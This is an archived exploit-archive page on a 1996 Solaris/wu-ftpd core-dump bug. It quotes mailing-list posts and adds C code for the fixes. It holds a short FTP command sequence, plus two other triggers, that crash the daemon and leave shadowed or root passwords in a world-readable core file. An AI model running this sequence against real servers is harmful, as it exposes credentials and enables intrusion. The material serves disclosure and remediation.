Solaris (and others) ftpd core dump bug

Summary
Description: Solaris ftpd (as well as others) can be made to core dump and divulge shadowed passwords
Author: Unknown
Compromise: Can obtain the crypt()ed root password
Vulnerable Systems: Solaris (at least 2.5) and others including wu.ftpd. If the enclosed doesn't work, try killing the process yourself.
Date: 15 October 1996
Notes: See addendum
Details

Exploit:

From: Martin Rex (martin.rex@sap-ag.de)
Date: Tue, 15 Oct 1996 18:14:08 -0400 

James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so they seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)

Addendum: Other ftpd bugs:

From: Vadim Kolontsov (vadim@tversu.ac.ru)
Date: Tue, 15 Oct 1996 08:41:40 +0300

Hello,

  wuftpd can create a core dump in the two following situations too (yes, the dump
will contain some subset of shadowed passwords):

1) "pasv" given when user not logged in
   (caused by error in passive())

2) more than 100 arguments to any executable command (for example, "list")
   (caused by error in ftpd_popen())

  The first error is present in almost all versions of BSD's ftpd, wu-ftpd and
derived. The second error is present in all versions of BSD's ftpd, wu-ftpd and
derived (as far as I know).
  Bugfixes are simple: checking for "pw != NULL" in the first case, and
checking for "argc < 100" in the other one (see sources).

Best regards, Vadim.

P.S. By the way, who knows e-mail of wu-ftpd developer? Mail me, pls...
--------------------------------------------------------------------------
Vadim Kolontsov                                          SysAdm/Programmer
Tver Regional Center of New Information Technologies          Networks Lab
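The two fixes named in the messages above ("pw != NULL" before PASV is honoured, and "argc < 100" before the argument array is filled) are small enough to show in full. The following is an added example written for this page, not code from any ftpd source: it models a session with a `pw_name` field standing in for the real `struct passwd *pw`, a hardened `passive()` that refuses PASV until a login has succeeded, and a bounded `split_args()` that stops at the 100-slot limit instead of writing past the end of `argv[]`. `MAXARGS`, `split_constructed()` and the reply strings are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Size of the fixed argv[] array in the original ftpd_popen(); the
   "argc < 100" fix from the message above refers to this bound. */
#define MAXARGS 100

/* Minimal stand-in for the daemon's per-session state. pw_name plays
   the role of struct passwd *pw, which is NULL until USER/PASS succeed. */
struct session {
    int logged_in;
    const char *pw_name;
};

/* Hardened passive(): the bug described above was a dereference of pw
   when PASV arrived before login. Refuse the command instead. */
int passive(const struct session *s, char *reply, size_t replylen)
{
    if (!s->logged_in || s->pw_name == NULL) {
        snprintf(reply, replylen, "530 Please login with USER and PASS.");
        return 530;
    }
    /* constructed data-connection address for the example */
    snprintf(reply, replylen, "227 Entering Passive Mode (127,0,0,1,4,1).");
    return 227;
}

/* Hardened argument splitting for an ftpd_popen()-style caller: tokenise
   cmdline into at most maxargs pointers (one slot reserved for the
   terminating NULL). Returns argc, or -1 when the line carries more
   words than the array can hold, which is the case that overran the
   original fixed array. cmdline is modified in place by strtok(). */
int split_args(char *cmdline, char *argv[], int maxargs)
{
    int argc = 0;
    char *tok = strtok(cmdline, " \t");
    while (tok != NULL) {
        if (argc >= maxargs - 1)
            return -1;
        argv[argc++] = tok;
        tok = strtok(NULL, " \t");
    }
    argv[argc] = NULL;
    return argc;
}

/* Build a constructed command line of nwords one-letter words and run it
   through split_args() with the MAXARGS bound. */
int split_constructed(int nwords)
{
    char line[1024];
    char *argv[MAXARGS];
    int i, n = 0;
    for (i = 0; i < nwords && n < (int)sizeof line - 2; i++) {
        line[n++] = 'a';
        line[n++] = ' ';
    }
    line[n] = '\0';
    return split_args(line, argv, MAXARGS);
}

int main(void)
{
    char reply[128];
    struct session anon = { 0, NULL };
    struct session user = { 1, "alice" };

    passive(&anon, reply, sizeof reply);
    printf("PASV before login: %s\n", reply);
    passive(&user, reply, sizeof reply);
    printf("PASV after login:  %s\n", reply);
    printf("99 words  -> argc %d\n", split_constructed(99));
    printf("100 words -> argc %d\n", split_constructed(100));
    return 0;
}
```

The PASV check returns the standard 530 reply rather than touching any login state, and the splitter reports an over-long line as an error for the caller to reject; either way the daemon never reaches the code path that produced the core file.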
This page is part of Fyodor's exploit world.